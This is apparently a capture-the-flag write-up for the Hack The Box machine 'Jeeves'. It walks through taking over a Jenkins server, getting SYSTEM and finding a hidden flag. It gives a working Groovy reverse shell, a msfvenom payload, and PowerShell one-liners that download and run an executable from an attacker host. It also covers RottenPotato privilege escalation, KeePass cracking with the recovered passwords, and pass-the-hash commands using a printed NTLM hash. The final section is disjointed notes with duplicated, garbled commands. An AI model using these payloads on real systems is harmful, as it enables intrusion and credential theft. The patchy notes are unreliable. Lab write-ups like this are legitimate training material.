We are seeing quite a few results for Jenkins, so there is a high probability that this server is running Jenkins as a service, and now we just have to discover it.

Dirbuster Next step is to dirbuster everything to discover the jenkins dashboard path. I always use the directory-list-2.3-medium.txt which comes default in kali for most HTB boxes.

It looks like /askjeves/ seems to be the correct path for the Jenkins main dashboard, confirming our suspicions that Jenkins is the running service.

Exploiting Jenkins

Method 1: Jenkins Script Console

Jenkins has a scripting console, which you can access by going to Manage Jenkins => Script Console

You can write scripts in the Groovy Scripting Language. I searched for groovy script run command example or if you just want to skip straight to the shell search groovy script reverse shell

Testing to see if we have code execution…

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'powershell.exe $PSVERSIONTABLE'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

From my search of groovy script reverse shell, I came across this Github gist – change the host and port parameter to match your settings, and hit “Run” in the script console & you will get a reverse shell.

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76

String host="10.10.15.30";
int port=8282;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Method 2: Build Job Exec Command

With Jenkins you can execute system commands as part of a deployment build job. The Jenkins server allowed anyone to do anything even to the anonymous user which means we can create a malicious deployment & execute our code.

Steps:

Steps:
Create new Build Job (http://10.10.10.63:50000/askjeeves/view/all/newJob)
Select “FreeStyle Project’
Hit Ok
Select “Build Enviroment”
Generate payload / put the code you want to execute as a build step
Hit Apply
Start Build
You can run any system commands you want in the predeployment step, I used a msfvenom payload just to validate that it’s possible.

msfvenom -p windows/meterpreter/reverse_http LHOST=10.10.15.30 LPORT=8081 -f psh-cmd > 8081.cmd

https://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload/ https://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

Privilege Escalation:

It looks like this machine is vulnerable two a few LPE exploits the big ones being MS16-075 (RottenPotato) & MS16-032. From our sysinfo output we can rule out MS16-032 because that particular exploit requires two cpu(s), and this machine has only one cpu.

It looks like this machine is vulnerable to MS16-075 (which I would say is fairly reliable when available), and from our eariler whoami /all command it seems we have everything in place to successfully execute this exploit.

MS16-075 Windows smb server
MS16-032 - Security update for secondary logon to address elevation of privilege
Method 1: MS16-075 “RottenPotato”

The steps to successfully exploit MS16-075 “rotten potato” (with meterpreter) is:

Have meterpreter shell
Upload RottenPotato/potato exploit executeable
Load ignognito on meterpreter session
Execute rottenpotato executable
Impersonate NT Authority/SYSTEM token
You are now system.

Powershell 1-liner for download + executing file (getting meterpreter shell):

powershell -exec bypass -c "(New-Object Net.WebClient).DownloadFile('http://10.10.15.30:9999/8383.exe','8383.exe')";Start-Process '8383.exe'

On Jeeves Host

cd %appdata%

powershell -exec bypass -c "(New-Object Net.WebClient).DownloadFile('http://10.10.15.30:9999/8383.exe','8383.exe')";Start-Process '8383.exe'

Completing the required steps for the exploit

upload /opt/serve/windows/priv/rottenpotato.exe
load incognito
execute -cH -f rottenpotato.exe
list_tokens -u

impersonate_token "NT AUTHORITY\SYSTEM"

Method 2: Crack Keepass Database to Pass-the-hash

If you searched through the user kohsuke documents directory you would discover a file called CEH.kbdx. Normally the .kbdx file extension is associated with the KeePass Password Safe. If we can crack the password on this vault file, we will likely find credentials to potentially the local administrator account.

Downloading the Keepass Database file with meterpreter download CEH.kdbx

verifying the downloaded file root@dastinia:~/htb/jeeves# file CEH.kdbx

Before we can crack the CEH.kbdx we need to convert it to a format that either john or hashcat can understand. We can use the tool keepass2john (comes preinstalled on kali) to do this.

keepass2john CEH.kdbx

cracking the hash & getting the password of the vault with john john --wordlist=/usr/share/wordlists/rockyou.txt CEH.hash

Here are the contents that were contained in the keepass database file.

Password 12345 F7WhTrSFDKB6sxHU1cUn pwndyouall! lCEUnYPjNfIuPZSzOySA S1TjAtJHKsugh9oC4VZl aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

https://github.com/byt3bl33d3r/CrackMapExec

We have a few passwords & and a hash aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 which happens to be an NTLM hash. The SMB Service (Port 445) is exposed on this server, so we can attempt to authenticate to the system using a password spray attack or a pass-the-hash attack.

crackmapexec smb ip -u Administrator -p ceh_db_passwords.txt --lusers

crackmapexec smb ip -u administrator -H ceh_db_hash.txt --lusers

Shell with Metasploit PSEXEC Module & Hash With a valid hash of the administrator account, we can perform a pass-the-hash attack & compromise the machine. I chose to use Metasploit for this, but there are plenty of tools which do the same thing as this module.

Getting SYSTEM shell with msf psexec
use exploit/windows/smb/psexec
exploit done with hash
Getting the “Hidden” root.txt

dir /a

dir /R That hm.txt:root.txt:$DATA means that the file root.txt is inside an alternate data stream inside hm.txt

You can see the contents of an ADS stream a few different ways but the simplist way in my opinion is using the more command on windows…

more < hm.txt:root.txt

blog 2nd

search -f *.kdbx /exploit/windows/smb/psexec

chose to use the simple pth-winexe program, shown below. Metasploit's exploit/windows/smb/psexec module is also an option.

pth-winexe https://blog.ropnop.com/practical-usage-of-ntlm-hashes/ crackmapexec ip -u user -H hash

pth-toolkit and Impacket pth-net
pth-rpcclient
pth-smbclient
pth-smbget
pth-sqsh
pth-winexe
pth-wmic
pth-wmis

pth-winexe. The pth suite uses the format DOMAIN/user%hash:

pth-winexe -U pth-winexe -U administrator //192.168.1.101 cmd pth-winexe -U admin/hash:has //192.168.0.101 cmd

pth-winexe -U Administrator%'hash' //ip cmd.exe

gobuster -e -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25

john --format="keepass" --wordlist=/usr/share/wordlists/rockyou.txt hash.txt pth-winexe -U ./Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe

Keepas password manager Doing a bit of roaming around the file system, I find an interesting .kdbx file. This file extension is associated with Keepass password manager. The mentiond .kdbx file can be found at C:\Users\kohsuke\Documents\CEH.kdbx. To transfer this file into our computer I first put netcat binary (in Kali: /usr/share/windows-binaries/nc.exe) onto the Windows system via Powershell:

Run inside the reverse shell:

powershell -c '(new-object System.Net.WebClient).DownloadFile("http://IP/nc.exe", "C:\Windows\Temp\nc.exe")'

OR

powershell -c 'Invoke-WebRequest "http://IP/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"' Note: Don’t forget to start a web server before you actually try to download a file.

Thanks to netcat, we are able to transfer the .kdbx file into our filesystem. We can then proceed to generate a hash with keepass2john.

=========================================================================